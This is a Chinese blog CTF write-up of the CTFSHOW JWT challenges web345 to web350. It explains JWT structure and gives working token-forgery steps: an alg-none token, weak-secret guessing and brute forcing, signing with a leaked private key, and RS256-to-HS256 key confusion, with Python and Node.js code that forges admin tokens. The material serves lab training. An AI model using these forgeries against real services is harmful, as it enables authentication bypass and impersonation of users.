CTFSHOW jwt篇

最新推荐文章于 2024-05-02 17:05:15 发布
最新推荐文章于 2024-05-02 17:05:15 发布
阅读量5.6k 收藏 8
点赞数 4
分类专栏: CTFSHOW web入门系列
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/miuzzx/article/details/111936737
版权

可以先了解下jwt
jwt由三部分组成header、payload、signature
header示例

{
  'typ': 'JWT',
  'alg': 'HS256'
}

payload示例

{
  "sub": "1234567890",
  "name": "John Doe"
}

signature
jwt的第三部分是一个签证信息,这个签证信息由三部分组成:
header (base64编码)
payload (base64编码)
secret(密钥)
这个部分需要base64加密后的header和base64加密后的payload使用.连接组成的字符串,然后通过header中声明的加密方式进行加盐secret组合加密,然后就构成了jwt的第三部分。

这三部分用.连接起来就是完整的jwt了。

jwt攻击参考文章https://xz.aliyun.com/t/2338

web345

jwt解密网站https://jwt.io/
这个题我们解密发现他没有第三部分,所以也就用不着知道他的密钥了。直接每一部分base64然后用.连接就可以了。
第一部分{"alg":"None","typ":"jwt"}base64编码后是eyJhbGciOiJOb25lIiwidHlwIjoiand0In0(去掉等号)
第二部分[{"sub":"admin"}]base64编码后是W3sic3ViIjoiYWRtaW4ifV0
所以把原来的jwt修改为eyJhbGciOiJOb25lIiwidHlwIjoiand0In0.W3sic3ViIjoiYWRtaW4ifV0然后访问/admin即可

web346

将算法改成none,user改成admin

import time
import jwt

# payload
token_dict = {
  "iss": "admin",
  "iat": 1610432484,
  "exp": 1610439684,
  "nbf": 1610432484,
  "sub": "admin",
  "jti": "efec0205f601a537847ee2dd3ffa81ff"
}

# headers
headers = {
  "alg": "none",
  "typ": "JWT"
}

jwt_token = jwt.encode(token_dict,  # payload, 有效载体 
					 key='',
                       headers=headers,  # json web token 数据结构包含两部分, payload(有效载体), headers(标头)
 					   algorithm="none",  # 指明签名算法方式, 默认也是HS256
                       ).decode('ascii')  # python3 编码后得到 bytes, 再进行解码(指明解码的格式), 得到一个str

print(jwt_token)

利用解密网站将user改成admin,然后拿着新生成的jwt替换原来的,再去访问/admin就能得到flag

web347

密钥是123456(猜的)
在这里插入图片描述

web348

利用jwt爆破攻击爆破
下载地址https://github.com/brendan-rius/c-jwt-cracker具体安装方法文档中有。
使用方法 ./jwtcrack jwt
在这里插入图片描述
爆破出来密钥是aaab,剩下的跟上面的一样了。

web349

利用私钥生成jwt,利用公钥解密jwt,所以我们只要有私钥然后自己重新生成就可以了。
访问/private.key得到私钥
运行下面的js代码生成jwt (需要安装jsonwebtoken库 npm install jsonwebtoken --save)

const jwt = require('jsonwebtoken');
var fs = require('fs');
var privateKey = fs.readFileSync('private.key');
var token = jwt.sign({ user: 'admin' }, privateKey, { algorithm: 'RS256' });
console.log(token)

修改jwt后post方式访问就可以得到flag
或者python代码

import jwt
public = open('private.key', 'r').read()
payload={"user":"admin"}
print(jwt.encode(payload, key=public, algorithm='RS256'))
# python2运行

web350

访问/public.key获得公钥
jwt攻击参考文章https://xz.aliyun.com/t/2338
这个题是利用的第三种
在这里插入图片描述

exp:

const jwt = require('jsonwebtoken');
var fs = require('fs');
var privateKey = fs.readFileSync('public.key');
var token = jwt.sign({ user: 'admin' }, privateKey, { algorithm: 'HS256' });
console.log(token)

jwt库要用题目给的源码中的,就是要保证版本一致。

yu22x
关注
  • 4
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
专栏目录
Ctfshow web入门 JWT web345-web350 详细题解 全
Jay17的博客
08-02 2201
Ctfshow web入门 JWT web345-web350 详细题解 全
ctfshow jwt web入门
最新发布
2301_81040377的博客
06-03 494
jwt令牌由三部分组成,由分割header示例payload示例。
ctfshow web入门 JWT
Anton1a的博客
02-24 4282
web345 打开题目先F12看一下源码发现一个admin目录,然后抓包看见cookie里面有jwt 然后将jwt进行base64解密,然后将解码后的user换成admin 再进行base64加密,然后抓包访问admin目录,之后将刚才生成的jwt,替换cookie里的jwt然后发包拿到flag 这里只需要注意访问的是/admin/而不是/admin因为访问/admin表示访问admin.php而访问/admin/表示访问的是admin目录下默认的index.php web346 这.
CTFshow JWT
starttv的博客
11-24 400
JSON Web Token(缩写 JWT)是目前最流行的跨域认证解决方案,该规范允许我们通过JWT在用户和服务器之间安全可靠地传递信息。
CTF-Web jwt
Makabakahaha的博客
10-04 242
web做题记录
ctfshow web入门 jwt
Sentiment的博客
12-10 2412
基础知识 jwt是由三部分构成的,第一部分是头部(header),第二部分是载荷(payload),第三部分为签证(signature) 头部 头部声明了类型和加密方法,如下 { 'typ': 'JWT', 'alg': 'HS256' } 然后将头部进行base64加密后去掉=号,构成第一部分 ewogICd0eXAnOiAnSldUJywKICAnYWxnJzogJ0hTMjU2Jwp9 载荷 和头部结构类似,但存放的是数据 签证 jwt的第三部分是一个签证信息,这个签证信息由三部分组成:
JWT学习笔记
01-21
JWT学习笔记 作为一名IT行业大师,我将详细解释JWT的概念、特点、优势和应用场景。 什么是JWT? JSON Web Token(JWT)是一种基于JSON的Web令牌,用于在各方之间安全地传输信息。它可以完成数据加密、签名等相关...
SpringSecurity集成JWT
05-15
文章将详细探讨如何将SpringSecurity与JWT相结合,实现高效且安全的身份验证。 首先,让我们了解一下SpringSecurity的基本配置。在SpringSecurity中,我们通常会创建一个`WebSecurityConfigurerAdapter`的子类...
JWT Token生成及验证
07-16
JSON Web Token(JWT)是一种开放的标准(RFC 7519),定义了一种紧凑的、自包含的方式来安全地在各方之间传输信息作为JSON对象。这种信息可以被验证和信任,因为它是数字签名的。JWT在身份验证和授权场景中广泛应用...
JWT 网关TOKEN 加密
05-15
JSON Web Token (JWT) 是一种广泛使用的轻量级身份验证机制,它允许服务端生成一个包含用户信息的令牌,该令牌可以在客户端之间安全地传递。然而,原始的JWT令牌可能包含敏感信息,如果未加密,可能会面临安全风险。...
jwthelper:JWT令牌生成器
02-24
JWT令牌生成器 生成私钥(jwt.salt)和jwt令牌的助手 该泊坞窗映像有助于快速创建私钥和JWT令牌。 可用版本 您可以通过“ 页面查看所有可从Docker Hub提取的图像。 以“更改类型”字词开头的Docker标记名称(例如...
ctfshow jwt学习
hcja666的博客
05-02 1040
JSON Web Token(JWT)是一个开放标准(RFC 7519),它定义了一种紧凑且自包含的方式,用于在各方之间安全地传输信息作为JSON对象。此信息可以被验证和信任,因为它是数字签名的。JWT可以使用秘密(使用HMAC算法)或使用RSA或ECDSA的公钥/私钥对进行签名。Header报头Payload有效载荷Signature签名因此,JWT通常看起来如下所示。Header报头Payload有效载荷iss:发行人exp:到期时间sub:主题aud:用户。
JWT学习(ctfshow web入门jwt
qq_45766062的博客
11-20 1258
jwt介绍 ctfshow web入门jwt web345 工具:burp suite,jwt在线解码工具链接 分析:首先看到提示/admin 访问抓包,看到auth,实际上就是jwt: 然后,用在线工具解码:
ctf web 的一些writeup jwt以及黑客游戏
qq_42520737的博客
08-09 3768
http://54.223.83.192:8877/ jwt 登陆问题 JSON Web Token(JWT)是一个开放式标准(RFC 7519),它定义了一种紧凑且自包含的方式,用于在各方之间以JSON对象安全传输信息。这些信息可以通过数字签名进行验证和信任。可以使用秘密(使用HMAC算法)或使用RSA的公钥/私钥对对JWT进行签名。       这道题的解题方式就是对其进行登陆抓...
Web攻防--JAVAWEB项目&JWT身份攻击&组件安全&Python考点&CTF与CMS-SSTI模版注入&PYC反编译
weixin_68243135的博客
11-15 514
WEB攻防--JWT--JAVAWEB项目--SSTI模板注入
ctfshow web入门 内网渗透
羽的博客
06-26 2254
首先在登录函数中存在doFilter对传入的用户名密码进行过滤,所以很难去注入。再来看下另外一台靶机,因为存在web服务,但是又不能出网所以通过ssh端口映射到本地来。没错,可以用phar,毕竟我们还有个文件上传的功能,后面需要做的就是这么触发phar。没有使用doFilter函数过滤,只是要求了我们传入的参数需要符合email格式。先看下445端口,靶机给我们提供了msf,所以直接用msf打下Samba。在api/index.php中存在一个写文件的功能,假如可以控制。的值,就可以写入一个木马进去。
BUUCTF刷题记录[RootersCTF2019]ImgXweb——JWT验证问题
u013119911的博客
07-02 8333
JWT
ctfshow JWT
09-08
CTFShow JWT是一个由头部、有效载荷和签名三部分组成的JSON Web Token。其中,头部包含了JWT的类型和使用的算法,有效载荷包含了一些信息,比如发行者、颁发时间、过期时间等,签名则用于验证JWT的完整性和真实性。 在CTFShow中,可以通过改变JWT的头部和有效载荷来实现一些攻击或绕过验证的操作。例如,可以将头部的算法字段改为"none",将有效载荷中的用户字段改为"admin",以绕过网站的JWT算法限制。 为了生成这样的JWT,可以使用Python脚本来生成。脚本中使用了jwt库,通过指定合适的头部、有效载荷和算法来生成JWT。具体来说,可以将头部的算法字段设置为"none",将有效载荷中的用户字段设置为"admin"。生成的JWT可以用于攻击或验证绕过。 总结来说,CTFShow JWT是一个由头部、有效载荷和签名组成的JSON Web Token,在CTFShow中可以通过改变JWT的头部和有效载荷来实现一些攻击或绕过验证的操作。<span class="em">1</span><span class="em">2</span><span class="em">3</span>

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

yu22x

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值